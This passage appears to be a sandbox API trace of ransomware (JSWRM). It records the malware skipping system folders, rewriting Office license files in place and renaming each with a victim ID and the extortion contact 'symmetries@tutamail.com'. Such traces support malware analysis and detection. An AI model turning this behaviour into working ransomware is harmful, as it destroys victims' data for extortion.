ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebbd758f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebc9614d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2161, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_MAK-ppd.xrm-ms", cAlternateFileName="STB1A3~1.XRM")) returned 1 [0110.590] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0110.590] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0110.590] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0110.590] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.591] lstrcmpiW (lpString1="StandardVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0110.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0110.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0110.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0110.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.592] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=8545) returned 1 [0110.592] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2160) returned 0x205850 [0110.592] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x2160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x2160, lpOverlapped=0x0) returned 1 [0110.594] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.594] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x2160, lpOverlapped=0x0) returned 1 [0110.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0110.594] CloseHandle (hObject=0x45c) returned 1 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0110.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0110.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0110.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0110.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0110.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.595] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0110.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0110.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0110.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0110.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0110.596] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebb8b0de, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebb8b0de, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebc6fef4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d47, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_MAK-ul-oob.xrm-ms", cAlternateFileName="ST2A5C~1.XRM")) returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.596] lstrcmpiW (lpString1="StandardVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0110.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2412e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0110.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0110.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0110.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0110.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0110.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.597] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11591) returned 1 [0110.598] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0110.598] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0110.600] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.600] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0110.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.600] CloseHandle (hObject=0x45c) returned 1 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0110.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0110.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0110.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0110.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0110.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0110.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0110.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0110.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0110.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0110.602] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebb64e83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebb64e83, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebc49c9c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_MAK-ul-phn.xrm-ms", cAlternateFileName="STE8E3~1.XRM")) returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0110.602] lstrcmpiW (lpString1="StandardVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0110.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0110.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0110.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0110.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.603] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19936) returned 1 [0110.603] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0110.603] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0110.605] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.606] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0110.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.606] CloseHandle (hObject=0x45c) returned 1 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0110.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0110.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0110.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0110.607] HeapFree (in: hHeap=0x1e0000, 